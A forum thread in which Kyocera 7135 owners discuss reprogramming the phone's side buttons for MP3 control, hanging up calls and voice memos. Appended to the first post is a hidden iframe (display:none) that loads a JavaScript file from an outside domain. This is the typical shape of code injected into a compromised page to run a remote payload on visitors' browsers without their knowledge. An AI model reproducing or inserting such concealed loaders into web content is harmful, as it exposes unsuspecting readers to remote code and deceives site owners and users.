+ Reply to Thread

Thread: Side Buttons

Side Buttons

Has anyone found a way to program the side buttons to do anything besides volume?

Just curious.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Probably won't be much action on that until Kyo release SDK's.

Would be cool to use them as "next" and "previous" when your just using it as a MP3 player.. you could just use the onscreen volume control for volume.

Anybody else got an idea?
    iPhone therefore iAm.

I wish they let you program those keys as well. I've already embarrassed myself at work by unplugging the headset plug while the MP3 player was still going and having the sound come blasting out of the phone speaker. All the while fumbling around trying to get back to the program to stop it playing.

Found that if you hit the red phone button it will stop it playing faster.

The other thing they could have done was to put a volume control on the headset cord.
    Taylor Made Web Sites and Domain Services
    Happy Kyocera 7135 User 2003-2008. Now Treo 800w.

I wish they would program these side buttons to hang up a call when you are in headset mode (like the v60). Not all headsets have hangup buttons on them.

Illegitimis nil carborundum DanDiego's Avatar
    Would also like to see the side buttons let you record a voice-memo through the headset so you don't have to open the phone. That would be cool when driving. The jog-dial on my 6035 worked great for that.

I thought that I'd seen here that these buttons will work to adjust the sound of MP3s while playing with the flip closed, but when I use them in that situation it adjusts the ringer volume, which just starts the ringer inturrupting the music. Was I mistaken or is there something I'm not doing right?
    Sorry, but I no longer make 7135 headset adapters.

I don't think you're missing anything. As far as I can tell, the buttons only work the phone & ringer volume up and down and put it in and out of silent mode.
    Taylor Made Web Sites and Domain Services
    Happy Kyocera 7135 User 2003-2008. Now Treo 800w.